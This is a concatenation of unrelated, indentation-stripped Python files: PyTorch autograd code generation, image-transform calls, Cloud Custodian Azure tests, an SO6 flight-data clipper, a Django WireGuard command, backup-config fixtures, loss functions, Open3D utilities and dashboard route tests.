env['args_with_derivatives'] = reference_args(args_with_derivatives)
env['op'] = func['op'] if func is not None else 'NotImplemented'
env['op_ctor'] = '' if func is not None else '"{}"'.format(declaration['api_name'])
if is_out_fn:
setup = ['throw_error_out_requires_grad("{}");'.format(base_name)]
body = []
body.append(DECLARE_GRAD_FN.substitute(op='Function'))
body.append(SETUP_DERIVATIVE.substitute(
setup=setup,
args_with_derivatives=reference_args(differentiable_inputs)))
body.append(SETUP_DERIVATIVE.substitute(
setup=setup,
args_with_derivatives=reference_args(differentiable_outputs)))
return body
setup = []
setup.extend(ASSIGN_GRAD_FN.substitute(env).split('\n'))
setup.extend(emit_save_inputs())
body = []
body.extend(emit_check_no_requires_grad(differentiable_inputs, args_with_derivatives))
body.append(DECLARE_GRAD_FN.substitute(env))
body.append(SETUP_DERIVATIVE.substitute(env, setup=setup))
return body
def emit_check_no_requires_grad(tensor_args, args_with_derivatives):
"""Checks that arguments without derivatives don't require grad"""
body = []
for arg in tensor_args:
if arg in args_with_derivatives:
continue
name = arg['name']
if name in non_differentiable_arg_names:
continue
if name == 'output':
# Double-backwards definitions sometimes take in 'input' and
# 'output', but only define the derivative for input.
continue
if arg['dynamic_type'] in {'IndexTensor', 'BoolTensor'}:
continue
body.append('check_no_requires_grad({}, "{}");'.format(name, name))
return body
def save_variables(saved_variables, is_output, guard_for=lambda name: None):
# assign the saved variables to the generated grad_fn
stmts = []
for arg in saved_variables:
name = arg['name']
expr = arg.get('expr', arg['name'])
if arg['type'] == 'Tensor' or (is_output and arg['type'] == 'Scalar'):
name += '_'
var = arg['name']
if var == 'self' and inplace:
var = 'self.clone()'
assert not is_output
if inplace and is_output:
var = 'self'
expr = 'SavedVariable({}, {})'.format(var, str(is_output).lower())
elif arg['type'] == 'TensorList':
name += '_'
expr = 'make_saved_variable_list({})'.format(arg['name'])
elif arg['type'] == 'IntArrayRef':
expr = expr + ".vec()"
guard = guard_for(arg)
if guard is None:
stmts.append('grad_fn->{} = {};'.format(name, expr))
else:
stmts.append('if ({}) {{'.format(guard))
stmts.append(' grad_fn->{} = {};'.format(name, expr))
stmts.append('}')
return stmts
def reference_args(args):
res = []
for arg in args:
if arg['type'] == 'SparseTensorRef':
res.append('{}.tref'.format(arg['name']))
else:
res.append(arg['name'])
return res
def emit_record_trace(env):
if not should_trace(declaration):
return ('', '')
return format_trace(declaration)
def declare_returned_variables():
if modifies_arguments:
return ''
if len(declaration['returns']) == 1:
return ''
# TODO: this will be ugly
names = [ret['type'] + ' ' + ret['name'] + ';' for ret in declaration['returns']]
return '\n'.join(names)
def wrap_output(call):
# Returns a 2-tuple `(wrapped_call, extra_wrapping_stmts)`, where
# `wrapped_call` is to drop-in replace `call`, and
# `extra_wrapping_stmts` is a list of extra statements to run after
# `call`.
if 'Tensor' not in declaration['return_type']:
return call, []
elif view_info is not None:
# See NOTE [ Autograd View Variables ] in variable.h for details.
differentiable_output_vars = {r['name'] for r in differentiable_outputs}
tensor_output_vars = {r['name'] for r in returns if 'Tensor' in r['type']}
if not isinstance(view_info, dict):
if len(differentiable_output_vars) == len(tensor_output_vars):
# all outputs are differentiable
return 'as_view({}, {}, true)'.format(view_info, call), []
elif len(differentiable_output_vars) == 0:
# no output is differentiable
return 'as_view({}, {}, false)'.format(view_info, call), []
else:
# some of the outputs are differentiable
# need to expand to dict mode, i.e., one entry per output
base_name = view_info
view_info_dict = {}
for i, return_info in enumerate(returns):
if 'Tensor' in return_info['type']:
view_info_dict[i] = base_name
else:
view_info_dict = view_info
def wrap_view_single(output_var, base_var):
fmt = '{output_var} = as_view({base_var}, {output_var}, {is_differentiable});'
if output_var in differentiable_output_vars:
# If `GradMode::is_enabled()` is False, this is a
# non-differentiable view. Gradients should not flow through.
is_differentiable = 'true'
else:
# This output is non-differentiable, so it is a
# non-differentiable view. Gradients should not flow through.
is_differentiable = 'false'
return fmt.format(output_var=output_var, base_var=base_var,
is_differentiable=is_differentiable)
extra_wrapping_stmts = []
for output_idx, return_info in enumerate(returns):
if 'Tensor' not in return_info['type']:
assert output_idx not in view_info_dict, 'Can not wrap non-Tensor output as a view'
continue
output_var = return_info['name']
if output_idx in view_info_dict:
stmt = wrap_view_single(output_var, view_info_dict[output_idx])
elif 'Tensor' in return_info['type']:
stmt = '{output_var} = as_variable({output_var});'.format(output_var=output_var)
extra_wrapping_stmts.append(stmt)
return call, extra_wrapping_stmts
else:
return 'as_variable({})'.format(call), []
def enforce_same_tensorimpl_and_storage(env, call):
save_ptrs_stmts = []
enforce_same_ptrs_stmts = []
if declaration['name'] not in DONT_ENFORCE_SAME_TENSOR_IMPL_OR_STORAGE:
for arg in env.get('unpacked_args', []):
simple_type = env['unpacked_args_simple_type'][arg]
if simple_type == 'TensorList':
save_ptrs_stmts += [SAVE_TENSORLIST_STORAGE.substitute(tensorlist_name=arg),
SAVE_TENSORLIST_IMPL.substitute(tensorlist_name=arg)]
enforce_same_ptrs_stmts += [ENFORCE_SAME_TENSORLIST_STORAGE.substitute(tensorlist_name=arg),
ENFORCE_SAME_TENSORLIST_IMPL.substitute(tensorlist_name=arg)]
elif simple_type == 'Tensor':
save_ptrs_stmts += [SAVE_TENSOR_STORAGE.substitute(tensor_name=arg),
SAVE_TENSOR_IMPL.substitute(tensor_name=arg)]
enforce_same_ptrs_stmts += [ENFORCE_SAME_TENSOR_STORAGE.substitute(tensor_name=arg),
ENFORCE_SAME_TENSOR_IMPL.substitute(tensor_name=arg)]
assert (save_ptrs_stmts and enforce_same_ptrs_stmts) or (not save_ptrs_stmts and not enforce_same_ptrs_stmts)
if save_ptrs_stmts and enforce_same_ptrs_stmts:
call = RUN_ONLY_IN_DEBUG_MODE.substitute(statements=save_ptrs_stmts) + \
call + \
RUN_ONLY_IN_DEBUG_MODE.substitute(statements=enforce_same_ptrs_stmts)
return call
def emit_call(env):
combined = nested_dict(env, declaration)
extra_wrapping_stmts = []
if strategy == 'use_derived':
# We only care about adding `at::AutoNonVariableTypeMode` guard for `baseType` dispatch
# (which corresponds to 'use_derived' strategy). The purpose of this guard is to make sure
# the baseType operations still dispatch to non-Variable type, even if the arguments passed
# in are now Variables.
# See NOTE [ Treating Variables as non-Variables in type dispatch ] for details.
base_type_call = CALL_VIA_DERIVED.substitute(combined)
if not modifies_arguments and not returns_void:
rhs_value, extra_wrapping_stmts = wrap_output('tmp')
call = DISPATCH_TO_NON_VAR_TYPE_WITH_RETURN_VALUES.substitute(
base_type_call=base_type_call,
return_values=tie_return_values(),
rhs_value=rhs_value)
else:
call = DISPATCH_TO_NON_VAR_TYPE_WITHOUT_RETURN_VALUES.substitute(
base_type_call=base_type_call)
else:
call = CALL_VIA_TYPE.substitute(declaration)
if not modifies_arguments and not returns_void:
call = '{} = {}'.format(tie_return_values(), call)
call = call + ';'
for stmt in extra_wrapping_stmts:
call += '\n' + stmt
call = enforce_same_tensorimpl_and_storage(env, call)
return call
def tie_return_values():
if len(declaration['returns']) == 1:
return 'auto {}'.format(declaration['returns'][0]['name'])
names = [ret['name'] for ret in declaration['returns']]
return 'std::tie({})'.format(', '.join(names))
def get_return_value():
if inplace:
return 'self'
if is_out_fn:
return_names = [arg['name'] for arg in arguments
if arg.get('output', False)]
if len(return_names) == 1:
return return_names[0]
return 'std::forward_as_tuple({})'.format(', '.join(return_names))
returns = declaration['returns']
if len(returns) == 1:
return returns[0]['name']
moved = ['std::move({})'.format(r['name']) for r in returns]
return 'std::make_tuple({})'.format(', '.join(moved))
def emit_history():
fn = 'rebase' if modifies_arguments and view_info is None else 'set'
output_names = [r['name'] for r in differentiable_outputs]
# TODO: flatten allocates a std::vector, which could be expensive
outs = CodeTemplate("flatten_tensor_args( ${outs} )").substitute(outs=output_names)
return SET_HISTORY.substitute(fn=fn, differentiable_outputs=outs)
def emit_save_outputs():
if is_out_fn:
# out functions don't currently support differentiation
return ''
func = declaration['derivative']
if func is not None:
stmts = save_variables(func['saved_outputs'], True)
if len(stmts) == 0:
return ''
return CONDITIONAL.substitute(cond='grad_fn', statements=stmts)
return ''
def emit_check_inplace():
if not inplace:
return []
return ['check_inplace({});'.format(arg['name']) for arg in differentiable_outputs]
def emit_increment_version():
if not modifies_arguments:
return []
return ['increment_version({});'.format(arg['name']) for arg in differentiable_outputs]
def check_record_function_input_type(simple_type):
return simple_type in ['Tensor', 'Scalar']
def record_function_input_names():
return ', '.join([
arg['name'] for arg in declaration['arguments']
if check_record_function_input_type(arg['simple_type'])])
env = {}
combined = nested_dict(env, declaration)
body = []
if base_name not in DONT_PROFILE:
input_names = record_function_input_names()
body.append(
RECORD_FUNCTION.substitute(combined, input_names=input_names))
if strategy != 'use_type':
body.extend(unpack_args(env, declaration))
if requires_derivative:
body.extend(emit_check_inplace())
body.extend(setup_derivative(differentiable_inputs))
body.append(declare_returned_variables())
pre_record_trace, post_record_trace = emit_record_trace(env)
body.append(pre_record_trace)
body.append(emit_call(env))
if requires_derivative:
# set_flags has to appear after version_counter, because rebase_history
# requires that the counter is incremented before it is called
body.extend(emit_increment_version())
body.append(emit_history())
# post_record_trace must appear before save_outputs so that saved outputs
# have their tracing state saved (that is setup by recordTrace)
body.append(post_record_trace)
if requires_derivative:
body.append(emit_save_outputs())
if not returns_void:
body.append('return {};'.format(get_return_value()))
return body
def unpack_args(env, declaration):
def requires_unpack(arg):
return 'Tensor' in arg['dynamic_type']
body = []
unpacked_args = []
unpacked_args_simple_type = {}
for i, arg in enumerate(declaration['arguments']):
if not requires_unpack(arg):
unpacked_args.append(arg['name'])
unpacked_args_simple_type[arg['name']] = arg['simple_type']
continue
dynamic_type = arg['dynamic_type']
if 'TensorOptions' not in dynamic_type:
is_nullable = arg.get('is_nullable', False)
ref = (not is_nullable) and dynamic_type not in ['TensorList', 'SparseTensorRef']
suffix = '_opt' if is_nullable and dynamic_type != 'TensorList' else ''
body.append(UNPACK_TENSOR.substitute(
arg_name=arg['name'],
arg_pos=i,
suffix=suffix,
ref='&' if ref else '',
))
else:
# Okay, we are abusing the definition of 'unpack' here a bit,
            # although it's still getting the non-variable from the variable
# (in this case via TensorOptions rather than Variable/Tensor).
body.append(UNPACK_OPTIONS.substitute(arg_name=arg['name']))
unpacked_args.append(arg['name'] + '_')
unpacked_args_simple_type[arg['name'] + '_'] = arg['simple_type']
env['unpacked_args'] = unpacked_args
env['unpacked_args_simple_type'] = unpacked_args_simple_type
return body
def dispatch_strategy(declaration):
"""How are we going to call the underlying implementation of a
declaration? There are two strategies:
- use_derived: we want to call the implementation on CPUDoubleType
(or a similar, derived Type instance). Because these derived
instances deal in Tensors, not Variables (it's a completely different
object, so it doesn't dispatch back to VariableType), code on
this dispatch path needs to wrap/unwrap tensors. If the
derived implementation takes and returns tensors, the
implementation is usually differentiable (although we also use
the derived dispatch path for non-differentiable functions
that we still want to dispatch on the derived Type instance;
e.g., size())
- use_type: we want to call the implementation on Type, because
it is implemented concretely, and the functions it invokes will
get dispatched back to VariableType (which will ensure that they
are differentiable.)
"""
if (declaration['abstract'] or declaration['requires_tensor'] or
declaration['derivative'] is not None):
# If the function is abstract (not implemented on at::Type), we must
# call the implementation on the derived type with unpacked tensors.
# If the function has a derivative specified and is concrete, we could
        # call either implementation. We prefer calling the derived
# type's implementation with unpacked tensors because it is more
# performant in some cases: any internal calls to other ATen functions
# won't have the history tracked.
# If the function has a type dispatched argument (i.e. is a factory),
# we prefer calling the derived type's implementation both because it is
# more performant and to ensure factory functions return tensors with _version
        # of 0 (probably not strictly necessary, but nice to have to keep versions simple
        # to understand.)
return 'use_derived'
else:
# If the function is concrete (we don't have to override it) and we
# didn't declare it in derivatives.yaml, we'll assume that it is
# actually implemented out of differentiable functions. (This
# assumption might not hold, but then you'll see gradcheck fail.)
return 'use_type'
|
import os
from transmogrify import Transmogrify
square_img = os.path.abspath(os.path.join(os.path.dirname(__file__), 'testdata', 'square_img.jpg'))
vert_img = os.path.abspath(os.path.join(os.path.dirname(__file__), 'testdata', 'vert_img.jpg'))
horiz_img = os.path.abspath(os.path.join(os.path.dirname(__file__), 'testdata', 'horiz_img.jpg'))
####
#### AutoCrop
####
Transmogrify(square_img, [('a', '100x100'),]).save()
Transmogrify(vert_img, [('a', '100x100'),]).save()
Transmogrify(horiz_img, [('a', '100x100'),]).save()
####
#### Thumbnail
####
Transmogrify(square_img, [('t', '200'),]).save()
Transmogrify(vert_img, [('t', '200'),]).save()
Transmogrify(horiz_img, [('t', '200'),]).save()
Transmogrify(square_img, [('t', 'x200'),]).save()
Transmogrify(vert_img, [('t', 'x200'),]).save()
Transmogrify(horiz_img, [('t', 'x200'),]).save()
Transmogrify(square_img, [('t', '200x200'),]).save()
Transmogrify(vert_img, [('t', '200x200'),]).save()
Transmogrify(horiz_img, [('t', '200x200'),]).save()
####
#### Resize
####
Transmogrify(square_img, [('r', '500'),]).save()
Transmogrify(vert_img, [('r', '500'),]).save()
Transmogrify(horiz_img, [('r', '500'),]).save()
Transmogrify(square_img, [('r', 'x500'),]).save()
Transmogrify(vert_img, [('r', 'x500'),]).save()
Transmogrify(horiz_img, [('r', 'x500'),]).save()
Transmogrify(square_img, [('r', '500x500'),]).save()
Transmogrify(vert_img, [('r', '500x500'),]).save()
Transmogrify(horiz_img, [('r', '500x500'),]).save()
####
#### Letterbox
####
Transmogrify(square_img, [('l', '500x500-f00'),]).save()
Transmogrify(vert_img, [('l', '500x500-f00'),]).save()
Transmogrify(horiz_img, [('l', '500x500-f00'),]).save()
Transmogrify(square_img, [('l', '500x500-fffee1'),]).save()
Transmogrify(vert_img, [('l', '500x500-fffee1'),]).save()
Transmogrify(horiz_img, [('l', '500x500-fffee1'),]).save()
####
#### ForceFit
####
Transmogrify(square_img, [('s', '300x300'),]).save()
Transmogrify(vert_img, [('s', '300x300'),]).save()
Transmogrify(horiz_img, [('s', '300x300'),]).save()
####
#### Crop
####
Transmogrify(square_img, [('c', '100x100'),]).save()
Transmogrify(vert_img, [('c', '100x100'),]).save()
Transmogrify(horiz_img, [('c', '100x100'),]).save()
####
#### Filter
####
Transmogrify(square_img, [('r', '300x300'), ('f', 'blur')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'contour')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'detail')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'edge_enhance')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'edge_enhance_more')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'emboss')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'find_edges')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'smooth')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'smooth_more')]).save()
Transmogrify(square_img, [('r', '300x300'), ('f', 'sharpen')]).save()
####
#### Border
####
Transmogrify(square_img, [('r', '300x300'), ('b', '3-fffee1')]).save()
|
# Copyright 2015-2018 Capital One Services, LLC
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
from ..azure_common import BaseTest, arm_template
class LoadBalancerTest(BaseTest):
def setUp(self):
super(LoadBalancerTest, self).setUp()
def test_load_balancer_schema_validate(self):
with self.sign_out_patch():
p = self.load_policy({
'name': 'test-load-balancer',
'resource': 'azure.loadbalancer',
'filters': [
{'type': 'frontend-public-ip',
'key': 'properties.publicIPAddressVersion',
'op': 'in',
'value_type': 'normalize',
'value': 'ipv4'}
]
}, validate=True)
self.assertTrue(p)
@arm_template('load-balancer.json')
def test_find_by_name(self):
p = self.load_policy({
'name': 'test-azure-loadbalancer',
'resource': 'azure.loadbalancer',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'cctestloadbalancer'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('load-balancer.json')
def test_find_by_frontend_ip(self):
p = self.load_policy({
'name': 'test-loadbalancer-with-ipv6-frontend',
'resource': 'azure.loadbalancer',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'cctestloadbalancer'},
{'type': 'frontend-public-ip',
'key': 'properties.publicIPAddressVersion',
'op': 'in',
'value_type': 'normalize',
'value': 'ipv4'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
|
import argparse
from concurrent.futures import ProcessPoolExecutor, as_completed
from pathlib import Path
from tqdm import tqdm
from traffic.core import Sector # for typing
from traffic.data import airac as sectors
from traffic.data.so6 import SO6
def clip(so6: SO6, sector: Sector) -> SO6:
return so6.inside_bbox(sector).intersects(sector)
def unpack_and_clip(filename: str, sectorname: str) -> SO6:
so6 = SO6.parse_so6(filename)
sector = sectors[sectorname]
if sector is None:
raise ValueError("Sector not found")
return clip(so6, sector)
def prepare_all(filename: Path, output_dir: Path, sectorname: str) -> None:
so6 = unpack_and_clip(filename.as_posix(), sectorname)
output_name = filename.with_suffix(".pkl").name
so6.to_pkl((output_dir / output_name).as_posix())
def glob_all(
directory: Path, output_dir: Path, sectorname: str, max_workers: int = 4
) -> None:
if not directory.is_dir():
raise ValueError(f"Directory {directory} does not exist")
if not output_dir.is_dir():
output_dir.mkdir(parents=True)
with ProcessPoolExecutor(max_workers=max_workers) as executor:
tasks = {
executor.submit(
prepare_all, filename, output_dir, sectorname
): filename
for filename in directory.glob("**/*.so6")
}
for future in tqdm(as_completed(tasks), total=len(tasks)):
try:
future.result()
except Exception as e:
print(f"Exception {e} occurred on file {tasks[future]}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Clip SO6 on sector")
parser.add_argument(
"-d", dest="directory", type=Path, help="directory containing so6 files"
)
parser.add_argument(
"-o",
dest="output_dir",
type=Path,
help="output directory for pkl files",
)
parser.add_argument(
"-s",
dest="sector_name",
help="name of the sector to pick in AIRAC files",
)
parser.add_argument(
"-t",
dest="max_workers",
default=4,
type=int,
help="number of parallel processes",
)
args = parser.parse_args()
glob_all(**vars(args))
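# Example invocation (the script name and paths are hypothetical; the sector
# name must exist in the loaded AIRAC data):
#   python clip_so6.py -d /data/so6 -o /data/clipped -s LFBBBDX -t 8
# This clips every **/*.so6 file under /data/so6 to sector LFBBBDX and writes
# one .pkl per input file into /data/clipped.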
|
'''
Pytorch implementation for Inception ResNet v2.
Original paper: https://arxiv.org/pdf/1602.07261.pdf
'''
# import torch
# import torch.nn as nn
# from torch.autograd import Variable
|
from django.core.management.base import BaseCommand
from django_wireguard.models import WireguardInterface
class Command(BaseCommand):
help = 'Setup WireGuard interface'
def add_arguments(self, parser):
parser.add_argument('name', type=str)
parser.add_argument('--listen-port', nargs='?', type=int, default=1194)
parser.add_argument('--private-key', nargs='?', type=str)
parser.add_argument('--address', nargs='*', type=str)
def handle(self, *args, **options):
interface = WireguardInterface.objects.filter(name=options['name'])
address = ','.join(options['address'] or [])
if interface.exists():
if options['private_key']:
interface.update(listen_port=options['listen_port'],
private_key=options['private_key'],
address=address)
else:
interface.update(listen_port=options['listen_port'],
address=address)
self.stderr.write(self.style.SUCCESS(f"Interface updated: {interface.first().name}.\n"))
else:
interface = WireguardInterface.objects.create(name=options['name'],
listen_port=options['listen_port'],
private_key=options['private_key'],
address=address)
self.stderr.write(self.style.SUCCESS(f"Interface created: {interface.name}.\n"))
|
import pytest
@pytest.fixture
def cache_dir(tmpdir):
cache_path = tmpdir.mkdir('cache')
return cache_path
@pytest.fixture
def config_content():
return """
[source]
backup_dirs=/ /root/ /etc "/dir with space/" '/dir foo'
backup_mysql=yes
[destination]
backup_destination={destination}
keep_local_path=/var/backup/local
[s3]
AWS_ACCESS_KEY_ID="XXXXX"
AWS_SECRET_ACCESS_KEY="YYYYY"
AWS_DEFAULT_REGION="us-east-1"
BUCKET="twindb-backups"
[mysql]
mysql_defaults_file=/etc/twindb/my.cnf
expire_log_days = 8
[ssh]
ssh_user="root"
ssh_key=/root/.ssh/id_rsa
port={port}
backup_host='127.0.0.1'
backup_dir=/tmp/backup
[retention]
hourly_copies=24
daily_copies=7
weekly_copies=4
monthly_copies=12
yearly_copies=3
"""
|
#%%
import torch
import numpy as np
def VecLoss(vec_tar, vec):
    """Negative sum of row-wise cosine similarities between vec and vec_tar."""
    vec_norm = torch.linalg.norm(vec, dim=1)
    vec = vec / (vec_norm.unsqueeze(1))
    vec_tar_norm = torch.linalg.norm(vec_tar, dim=1)
    vec_tar = vec_tar / (vec_tar_norm.unsqueeze(1))
    # check dot product
    loss = vec * vec_tar
    loss = torch.sum(loss)
    loss = -loss
    return loss
def Pos_norm2(output, label):
    """RMSE between the flattened translation parts of predicted 4x4 transforms and the label."""
    output = output[:, :, 0:3, 3]
    output = output.reshape(-1, output.size()[1] * output.size()[2])
    loss = torch.sqrt(torch.nn.MSELoss()(output, label))
    # print(output, label)
    return loss
def q_entropy(q_value):
    """Negative entropy of the Categorical distribution(s) parameterised by q_value."""
    loss = torch.distributions.Categorical(q_value).entropy()
    loss = -loss
    return loss
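# Minimal sanity check (a sketch; the tensor shapes are assumptions, not taken
# from the training code that uses these losses):
if __name__ == "__main__":
    a = torch.randn(4, 3)
    b = torch.randn(4, 3)
    # Identical directions give the minimum value, -batch_size.
    print(VecLoss(a, a).item())  # ~ -4.0
    print(VecLoss(a, b).item())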
|
# Open3D: www.open3d.org
# The MIT License (MIT)
# See license file or visit www.open3d.org for details
import copy
from py3d import *
from os import listdir, makedirs
from os.path import exists, isfile, join, splitext
#######################
# some global parameters for the global registration
#######################
n_frames_per_fragment = 100
n_keyframes_per_n_frame = 5
#######################
# file related
#######################
folder_fragment = "/fragments/"
template_fragment_posegraph = folder_fragment + "fragment_%03d.json"
template_fragment_posegraph_optimized = folder_fragment + \
"fragment_optimized_%03d.json"
template_fragment_mesh = folder_fragment + "fragment_%03d.ply"
folder_scene = "/scene/"
template_global_posegraph = folder_scene + "global_registration.json"
template_global_posegraph_optimized = folder_scene + \
"global_registration_optimized.json"
template_global_mesh = folder_scene + "integrated.ply"
def get_file_list(path, extension=None):
if extension is None:
file_list = [path + f for f in listdir(path) if isfile(join(path, f))]
else:
file_list = [path + f for f in listdir(path)
if isfile(join(path, f)) and splitext(f)[1] == extension]
file_list.sort()
return file_list
def get_rgbd_file_lists(path_dataset):
path_color = path_dataset + "/image/"
path_depth = path_dataset + "/depth/"
color_files = get_file_list(path_color, ".jpg") + \
get_file_list(path_color, ".png")
depth_files = get_file_list(path_depth, ".png")
return color_files, depth_files
def make_folder(path_folder):
if not exists(path_folder):
makedirs(path_folder)
#######################
# visualization related
#######################
flip_transform = [[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]]
def draw_registration_result(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.paint_uniform_color([1, 0.706, 0])
target_temp.paint_uniform_color([0, 0.651, 0.929])
source_temp.transform(transformation)
source_temp.transform(flip_transform)
target_temp.transform(flip_transform)
draw_geometries([source_temp, target_temp])
def draw_registration_result_original_color(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.transform(transformation)
source_temp.transform(flip_transform)
target_temp.transform(flip_transform)
draw_geometries([source_temp, target_temp])
|
from sfa_dash.conftest import BASE_URL
def test_get_no_arg_routes(client, no_arg_route):
resp = client.get(no_arg_route, base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_site_filtered_no_args(client, no_arg_route, site_id):
resp = client.get(no_arg_route, base_url=BASE_URL,
query_string={'site_id': site_id})
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_aggregate_filtered_no_args(client, no_arg_route, aggregate_id):
resp = client.get(no_arg_route, base_url=BASE_URL,
query_string={'aggregate_id': aggregate_id})
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_get_observation_routes(client, observation_id_route, observation_id):
resp = client.get(observation_id_route(observation_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_get_forecast_routes(client, forecast_id_route, forecast_id):
resp = client.get(forecast_id_route(forecast_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_get_site_routes(client, site_id_route, site_id):
resp = client.get(site_id_route(site_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_get_cdf_forecast_routes(
client, cdf_forecast_id_route, cdf_forecast_group_id):
resp = client.get(cdf_forecast_id_route(cdf_forecast_group_id),
base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_get_cdf_forecast_single_routes(
client, cdf_forecast_single_id_route, cdf_forecast_id):
resp = client.get(cdf_forecast_single_id_route(cdf_forecast_id),
base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_admin_route_list(client, admin_route):
resp = client.get(admin_route, base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_admin_multiarg_route_list(
client, admin_multiarg_route, permission_id, role_id, user_id,
valid_permission_object_id):
resp = client.get(
admin_multiarg_route(
valid_permission_object_id,
permission_id,
user_id,
role_id),
base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_user_id_routes(client, user_id_route, user_id):
resp = client.get(user_id_route(user_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_permission_id_routes(client, permission_id_route, permission_id):
resp = client.get(permission_id_route(permission_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_role_id_routes(client, role_id_route, role_id):
resp = client.get(role_id_route(role_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_aggregate_id_routes(client, aggregate_id_route, aggregate_id):
resp = client.get(aggregate_id_route(aggregate_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_report_id_routes(client, report_id_route, report_id):
resp = client.get(report_id_route(report_id), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
def test_clone_routes(client, clone_route, all_metadata_ids):
resp = client.get(clone_route(all_metadata_ids), base_url=BASE_URL)
assert resp.status_code == 200
contains_404 = (
"<b>404: </b>" in resp.data.decode('utf-8') or
'<li class="alert alert-danger">(404)' in resp.data.decode('utf-8')
)
assert not contains_404
|
from http import HTTPStatus
from exception.error_code import ErrorCode
from exception.base_exception import BaseException
class UnauthorizedException(BaseException):
"""
401 Unauthorized
"""
def __init__(self, error_code: ErrorCode):
super().__init__(HTTPStatus.UNAUTHORIZED, error_code)
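# Typical usage (a sketch; the ErrorCode member name is hypothetical):
#   raise UnauthorizedException(ErrorCode.INVALID_TOKEN)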
|
import torch
import torchvision.models as tvmodels
from .cifar_resnet import ResNet
from .mlp import MLP
def construct_model(args):
if args.model_name == 'resnet50':
model = tvmodels.resnet.resnet50(False)
elif args.model_name == 'resnet56':
model = ResNet()
elif args.model_name == 'MLP':
model = MLP()
else:
raise NotImplementedError
# default distribution, normalized version
distribution = torch.Tensor(args.num_classes).fill_(1)
if args.resume_model is not None:
resume_model = torch.load(
args.resume_model, map_location=lambda storage, loc: storage)
# model containing distribution
if 'distribution' in resume_model.keys():
distribution = resume_model['distribution']
resume_model = resume_model['model']
print('==> Resume distribution')
model.load_state_dict(resume_model)
print('==> Resume from model {}.'.format(args.resume_model))
else:
print('==> Not init network!')
return model, distribution
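# Sketch of how construct_model is typically driven (the attribute names come
# from the code above; the concrete values are hypothetical):
#   from argparse import Namespace
#   args = Namespace(model_name='resnet56', num_classes=10, resume_model=None)
#   model, distribution = construct_model(args)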
|
# coding: utf-8
# Copyright 2018 LINE Corporation
#
# LINE Corporation licenses this file to you under the Apache License,
# version 2.0 (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at:
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
